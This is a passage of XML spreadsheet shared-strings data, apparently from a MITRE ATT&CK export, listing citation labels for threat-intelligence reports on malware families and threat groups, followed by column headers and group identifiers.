    <t>(Citation: Secureworks IRON RITUAL Profile),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: MSTIC NOBELIUM May 2021),,(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: FireEye SUNBURST Additional Details Dec 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Symantec Sunburst Sending Data January 2021)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021),(Citation: CrowdStrike SUNSPOT Implant January 2021),,(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Unit42 SUPERNOVA Dec 2020),(Citation: CISA Supernova Jan 2021),(Citation: Carnegie Mellon University Supernova Dec 2020),(Citation: Splunk Supernova Jan 2021),(Citation: Guidepoint SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Mandiant - Synful Knock),(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>,(Citation: McAfee Honeybee),(Citation: Unit 42 CARROTBAT November 2018),(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),,(Citation: Malwarebytes Saint Bot April 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>(Citation: ThreatConnect Anthem),,(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>,,(Citation: Sophos SamSam Apr 2018),(Citation: Talos SamSam Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: Symantec Seaduke 2015),(Citation: Unit 42 SeaDuke 2015),(Citation: FireEye WMI 2015),(Citation: Mandiant No Easy Breach),(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>(Citation: McAfee Oceansalt Oct 2018),(Citation: Mandiant APT1 Appendix),,(Citation: McAfee Oceansalt Oct 2018),(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Jan 2019),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Cybereason TA505 April 2019),(Citation: Trend Micro TA505 June 2019),,(Citation: Proofpoint TA505 Jan 2019),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019),(Citation: Recorded Future RedEcho Feb 2021),(Citation: Kaspersky CactusPete Aug 2020),(Citation: TrendMicro EarthLusca 2022),,(Citation: FireEye APT41 Aug 2019),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: TrendMicro EarthLusca 2022),(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>,,(Citation: McAfee Shamoon December 2018),(Citation: FireEye Shamoon Nov 2016),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Symantec Shamoon 2012),(Citation: McAfee Shamoon December19 2018),(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021),(Citation: Accenture Lyceum Targets November 2021),,(Citation: Accenture Lyceum Targets November 2021),(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Molerats Dec 2020),,(Citation: BleepingComputer Molerats Dec 2020),(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>,,(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>(Citation: Check Point APT34 April 2021),,(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>,,(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Secureworks IRON HEMLOCK Profile),,(Citation: GitHub Sliver Upload),(Citation: GitHub Sliver Encryption),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: GitHub Sliver HTTP),(Citation: GitHub Sliver Netstat),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: GitHub Sliver File System August 2021),(Citation: GitHub Sliver C2),(Citation: GitHub Sliver Download),(Citation: GitHub Sliver Ifconfig),(Citation: GitHub Sliver C2 DNS),(Citation: GitHub Sliver Screen)</t>
  </si>
  <si>
    <t>(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: DHS CISA AA22-055A MuddyWater February 2022),,(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>,,(Citation: Microsoft Dofoil 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>,,(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>,(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye FiveHands April 2021),(Citation: BlackBerry CostaRicto November 2020),(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>(Citation: CISA SoreFang July 2016),(Citation: NCSC APT29 July 2020),,(Citation: CISA SoreFang July 2016),(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Molerat Mar 2020),(Citation: Cybereason Molerats Dec 2020),,(Citation: Unit42 Molerat Mar 2020)</t>
  </si>
  <si>
    <t>,,(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>(Citation: Secureworks GOLD KINGSWOOD September 2018),,(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>,,(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>(Citation: CameraShy),(Citation: Baumgartner Naikon 2015),,(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>(Citation: Symantec Sowbug Nov 2017),,(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017),,(Citation: Symantec Elfin Mar 2019),(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>(Citation: Cylance Shell Crew Feb 2017),,(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>(Citation: Cybereason StrifeWater Feb 2022),,(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>(Citation: Talos Promethium June 2020),(Citation: Bitdefender StrongPity June 2020),,(Citation: Talos Promethium June 2020),(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>,,(Citation: AlienVault Sykipot 2011),(Citation: Alienvault Sykipot DOD Smart Cards),(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>,,(Citation: Kaspersky Lab SynAck May 2018),(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),(Citation: Baumgartner Naikon 2015),(Citation: Trend Micro DRBControl February 2020),(Citation: NCC Group APT15 Alive and Strong),(Citation: Kaspersky Turla),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye admin@338),(Citation: CISA SoreFang July 2016),(Citation: Symantec Orangeworm April 2018),(Citation: McAfee Honeybee),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>,,(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),,(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Wilted Tulip July 2017),,(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Secureworks IRON RITUAL Profile),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: MSTIC NOBELIUM May 2021),,(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Check Point Sunburst Teardrop December 2020),(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>(Citation: Forcepoint Monsoon),,(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>(Citation: JPCert TSCookie March 2018),,(Citation: JPCert BlackTech Malware September 2019),(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: FireEye APT33 Sept 2017),,(Citation: CyberBit Early Bird Apr 2018),(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>(Citation: US-CERT TYPEFRAME June 2018),,(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>,,(Citation: TrendMicro Taidoor),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>(Citation: Tarrask scheduled task),,(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),(Citation: Baumgartner Naikon 2015),(Citation: Mandiant APT1),(Citation: Trend Micro DRBControl February 2020),(Citation: NCC Group APT15 Alive and Strong),(Citation: Alperovitch 2014),(Citation: Palo Alto OilRig May 2016),(Citation: TrendMicro EarthLusca 2022),(Citation: Kaspersky Turla),(Citation: CISA SoreFang July 2016),(Citation: McAfee Honeybee),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>,,(Citation: wardle evilquest partii),(Citation: wardle evilquest parti),(Citation: Trendmicro Evolving ThiefQuest 2020),(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky ThreatNeedle Feb 2021),,(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: Talos TinyTurla September 2021),,(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Kaspersky Tomiris Sep 2021)</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Mandiant No Easy Breach),(Citation: BlackBerry CostaRicto November 2020),(Citation: FoxIT Wocao December 2019),(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>(Citation: McAfee Lazarus Nov 2020),,(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike StellarParticle January 2022),,(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>(Citation: IBM TA505 April 2020),(Citation: Sophos New Ryuk Attack October 2020),(Citation: CrowdStrike Grim Spider May 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Proofpoint TA505 Sep 2017),,(Citation: Trend Micro Totbrick Oct 2016),(Citation: Cyberreason Anchor December 2019),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Microsoft Totbrick Oct 2017),(Citation: IBM TrickBot Nov 2016),(Citation: Trickbot VNC module July 2021),(Citation: Bitdefender Trickbot C2 infra Nov 2020),(Citation: Fidelis TrickBot Oct 2016),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Joe Sec Trickbot),(Citation: Fortinet TrickBot),(Citation: Bitdefender Trickbot March 2020),(Citation: S2 Grupo TrickBot June 2017),(Citation: ESET Trickbot Oct 2020),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>(Citation: Secureworks Karagany July 2019),(Citation: Symantec Dragonfly),(Citation: Gigamon Berserk Bear October 2021),,(Citation: Secureworks Karagany July 2019),(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>,,(Citation: Ge 2011)</t>
  </si>
  <si>
    <t>(Citation: Microsoft SIR Vol 21),(Citation: Microsoft NEODYMIUM Dec 2016),,(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>(Citation: ESET BackdoorDiplomacy Jun 2021),,(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>,,(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>,,(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 Sept 2018),,(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3),,(Citation: Kaspersky Sofacy),(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tropic Trooper May 2020),,(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>,,(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla),,(Citation: Symantec Waterbug),(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Valak May 2020),(Citation: Unit 42 Valak July 2020),(Citation: Unit 42 TA551 Jan 2021),(Citation: Secureworks GOLD CABIN),,(Citation: Bromium Ursnif Mar 2017),(Citation: TrendMicro Ursnif Mar 2015),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: FireEye Ursnif Nov 2017),(Citation: TrendMicro Ursnif File Dec 2014),(Citation: TrendMicro PE_URSNIF.A2),(Citation: NJCCIC Ursnif Sept 2016),(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Cloud Atlas August 2019),,(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>,,(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Valak May 2020),(Citation: Unit 42 Valak July 2020),(Citation: Unit 42 TA551 Jan 2021),(Citation: Secureworks GOLD CABIN),,(Citation: Cybereason Valak May 2020),(Citation: Unit 42 Valak July 2020),(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>(Citation: US-CERT Volgmer Nov 2017),,(Citation: US-CERT Volgmer Nov 2017),(Citation: Symantec Volgmer Aug 2014),(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018),(Citation: SecureWorks WannaCry Analysis),(Citation: LogRhythm WannaCry),(Citation: FireEye WannaCry 2017),,(Citation: SecureWorks WannaCry Analysis),(Citation: LogRhythm WannaCry),(Citation: US-CERT WannaCry 2017),(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>(Citation: Uptycs Confucius APT Jan 2021),(Citation: Check Point Warzone Feb 2020),,(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Uptycs Confucius APT Jan 2021),(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike EvilCorp March 2021),(Citation: NCC Group WastedLocker June 2020),,(Citation: Sentinel Labs WastedLocker July 2020),(Citation: NCC Group WastedLocker June 2020),(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Waterbear December 2019),,(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>(Citation: CISA WellMail July 2020),(Citation: NCSC APT29 July 2020),(Citation: Cybersecurity Advisory SVR TTP May 2021),,(Citation: CISA WellMail July 2020),(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>(Citation: CISA WellMess July 2020),(Citation: PWC WellMess July 2020),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: NCSC APT29 July 2020),(Citation: PWC WellMess C2 August 2020),,(Citation: CISA WellMess July 2020),(Citation: PWC WellMess July 2020),(Citation: NCSC APT29 July 2020),(Citation: PWC WellMess C2 August 2020)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DNC June 2016),(Citation: FoxIT Wocao December 2019),(Citation: Crowdstrike DNC June 2016),(Citation: F-Secure Lazarus Cryptocurrency Aug 2020),(Citation: Wevtutil Microsoft Documentation)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ember Bear Profile March 2022),(Citation: Mandiant UNC2589 March 2022),,(Citation: Microsoft WhisperGate January 2022),(Citation: Cybereason WhisperGate February 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Unit 42 WhisperGate January 2022),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),,(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>(Citation: objective-see windtail1 dec 2018),(Citation: objective-see windtail2 jan 2019),(Citation: SANS Windshift August 2018),,(Citation: objective-see windtail1 dec 2018),(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Dark Reading APT39 JAN 2019),(Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: Symantec Tick Apr 2016),(Citation: FireEye APT40 March 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Dell TG-3390),(Citation: Microsoft GALLIUM December 2019),,(Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: SecureList Silence Nov 2017),(Citation: Securelist DarkVishnya Dec 2018),,(Citation: Secpod Winexe June 2017)</t>
  </si>
  <si>
    <t>(Citation: Microsoft SIR Vol 21),(Citation: Microsoft NEODYMIUM Dec 2016),,(Citation: Microsoft SIR Vol 21),(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: TrendMicro EarthLusca 2022),,(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013),(Citation: Kaspersky Winnti June 2015),,(Citation: Microsoft Winnti Jan 2017),(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>,,(Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Oct 2018),(Citation: XAgentOSX 2017),(Citation: Symantec APT28 Oct 2018),,(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>,,(Citation: 20 macOS Common Tools and Techniques),(Citation: Application Bundle Manipulation Brandon Dalton),(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Oct 2018),(Citation: Symantec APT28 Oct 2018),(Citation: ESET Sednit Part 3),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),,(Citation: ESET Sednit Part 2),(Citation: Invincea XTunnel),(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>,,(Citation: Unit42 Xbash Sept 2018),(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro TropicTrooper 2015),,(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>,(Citation: Cylance Dust Storm),(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Cannon Nov 2018),(Citation: Unit42 Sofacy Dec 2018),(Citation: Palo Alto Sofacy 06-2018),(Citation: Securelist Sofacy Feb 2018),(Citation: ESET Zebrocy May 2019),,(Citation: Unit42 Cannon Nov 2018),(Citation: Unit42 Sofacy Dec 2018),(Citation: CISA Zebrocy Oct 2020),(Citation: Palo Alto Sofacy 06-2018),(Citation: Securelist Sofacy Feb 2018),(Citation: ESET Zebrocy Nov 2018),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA459 April 2017),,(Citation: Proofpoint ZeroT Feb 2017),(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>,,(Citation: Sophos ZeroAccess),(Citation: Ciubotariu 2014)</t>
  </si>
  <si>
    <t>,,(Citation: Talos Zeus Panda Nov 2017),(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),,(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019),(Citation: Secureworks BRONZEUNION Feb 2019),(Citation: Talos ZxShell Oct 2014),(Citation: Cisco Group 72),,(Citation: FireEye APT41 Aug 2019),(Citation: Secureworks BRONZEUNION Feb 2019),(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Bitter Bangladesh May 2022),,(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT40 March 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: McAfee Night Dragon),(Citation: TechNet At),(Citation: Linux at)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: Accenture Hogfish April 2018),(Citation: FireEye APT41 March 2020),(Citation: Symantec Waterbug Jun 2019),(Citation: PTSecurity Higaisa 2020),(Citation: Symantec Cicada November 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Malwarebytes Higaisa 2020),(Citation: FireEye APT10 Sept 2018),(Citation: Rancor Unit42 June 2018),,(Citation: Palo Alto Retefe),(Citation: LOLBAS Certutil),(Citation: Malwarebytes Targeted Attack against Saudi Arabia),(Citation: TechNet Certutil)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Soft Cell June 2019),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Symantec Orangeworm April 2018),(Citation: Dell Lateral Movement),(Citation: Microsoft GALLIUM December 2019),(Citation: McAfee Honeybee),(Citation: TechNet Cmd),(Citation: TechNet Del),(Citation: TechNet Dir),(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FoxIT Wocao December 2019),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Harmj0y Domain Trusts),(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 Sept 2018),(Citation: NCC Group Chimera January 2021),,(Citation: Cary Esentutl),(Citation: LOLBAS Esentutl),(Citation: Red Canary 2021 Threat Detection Report March 2021)</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT41 March 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Palo Alto OilRig Oct 2016),,(Citation: Microsoft FTP),(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>(Citation: RSA2017 Detect and Respond Adair),(Citation: Villeneuve 2014),(Citation: CISA AA21-200A APT40 July 2021),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: Novetta-Axiom),(Citation: FireEye APT41 Aug 2019),(Citation: Secureworks BRONZEUNION Feb 2019),(Citation: Bizeul 2014),(Citation: Malwarebytes Higaisa 2020),(Citation: Proofpoint TA459 April 2017),(Citation: Cisco Group 72),(Citation: Cylance Dust Storm),(Citation: Alintanahin 2014),(Citation: Gh0stRAT ATT March 2019),(Citation: Arbor Musical Chairs Feb 2018),(Citation: Nccgroup Gh0st April 2018),(Citation: FireEye Hacking Team)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: TrendMicro Tonto Team October 2020),(Citation: Mandiant APT1),(Citation: Symantec Tick Apr 2016),(Citation: Dell TG-3390),(Citation: Bizeul 2014),(Citation: McAfee Night Dragon),(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>(Citation: ThreatStream Evasion Analysis),(Citation: Dell Lateral Movement),,(Citation: ThreatStream Evasion Analysis),(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>,,</t>
  </si>
  <si>
    <t>(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Group IB APT 41 June 2021),(Citation: Mandiant APT1),(Citation: NCC Group APT15 Alive and Strong),(Citation: ClearSky Siamesekitten August 2021),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Palo Alto OilRig May 2016),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye admin@338),(Citation: CISA SoreFang July 2016),(Citation: Symantec Orangeworm April 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),</t>
  </si>
  <si>
    <t>,,(Citation: Symantec Frutas Feb 2013),(Citation: jRAT Symantec Aug 2018),(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>,,(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>(Citation: Mandiant No Easy Breach),,</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla),,</t>
  </si>
  <si>
    <t>(Citation: Cybereason Cobalt Kitty 2017),(Citation: Baumgartner Naikon 2015),(Citation: US-CERT TA18-074A),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Novetta Blockbuster Loaders),(Citation: Group-IB Anunak),,(Citation: Securelist fileless attacks Feb 2017),(Citation: TechNet Netsh),(Citation: Demaske Netsh Persistence),(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017),(Citation: Kaspersky Lyceum October 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: NCC Group APT15 Alive and Strong),(Citation: FireEye APT41 Aug 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Kaspersky Turla),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye admin@338),(Citation: Symantec Orangeworm April 2018),(Citation: FoxIT Wocao December 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>(Citation: Citizen Lab Group5),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: FireEye APT41 Aug 2019),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: ESET Operation Spalax Jan 2021),(Citation: Citizen Lab Group5),(Citation: Trend Micro njRAT 2018),(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Mandiant APT1),(Citation: FireEye APT41 Aug 2019),(Citation: Symantec Chafer February 2018),,(Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>(Citation: Symantec Orangeworm April 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),,</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Double Tap),(Citation: Cybereason Kimsuky November 2020),(Citation: KISA Operation Muzabi),(Citation: Secureworks BRONZE BUTLER Oct 2017),,(Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>(Citation: NCC Group APT15 Alive and Strong),,(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>(Citation: Check Point Rocket Kitten),,(Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1 Appendix),,(Citation: xCmd)</t>
  </si>
  <si>
    <t>,,(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>,(Citation: McAfee Night Dragon),(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>associated groups</t>
  </si>
  <si>
    <t>associated groups citations</t>
  </si>
  <si>
    <t>G0099</t>
  </si>
  <si>
    <t>G0006</t>
  </si>
  <si>
    <t>G0005</t>
  </si>
  <si>
    <t>G0023</t>
  </si>
  <si>
    <t>G0025</t>
  </si>
  <si>
    <t>G0026</t>
  </si>
  <si>
    <t>G0073</t>
  </si>
  <si>
    <t>G0007</t>
  </si>
  <si>
    <t>G0016</t>
  </si>
  <si>
    <t>G0022</t>
  </si>
  <si>
    <t>G0013</t>
  </si>
  <si>
    <t>G0050</t>
  </si>
  <si>
    <t>G0064</t>
  </si>
  <si>
    <t>G0067</t>
  </si>
  <si>
    <t>G0082</t>
  </si>
  <si>
    <t>G0087</t>
  </si>
  <si>
    <t>G0096</t>
  </si>
  <si>
    <t>G0130</t>
  </si>
  <si>
    <t>G0138</t>
  </si>
  <si>
    <t>G1007</t>
  </si>
  <si>
    <t>G0143</t>
  </si>
  <si>
    <t>G0001</t>
  </si>
  <si>
    <t>G1002</t>
  </si>
  <si>
    <t>G0060</t>
  </si>
  <si>
    <t>G0135</t>
  </si>
  <si>
    <t>G0063</t>
  </si>
  <si>
    <t>G0098</t>
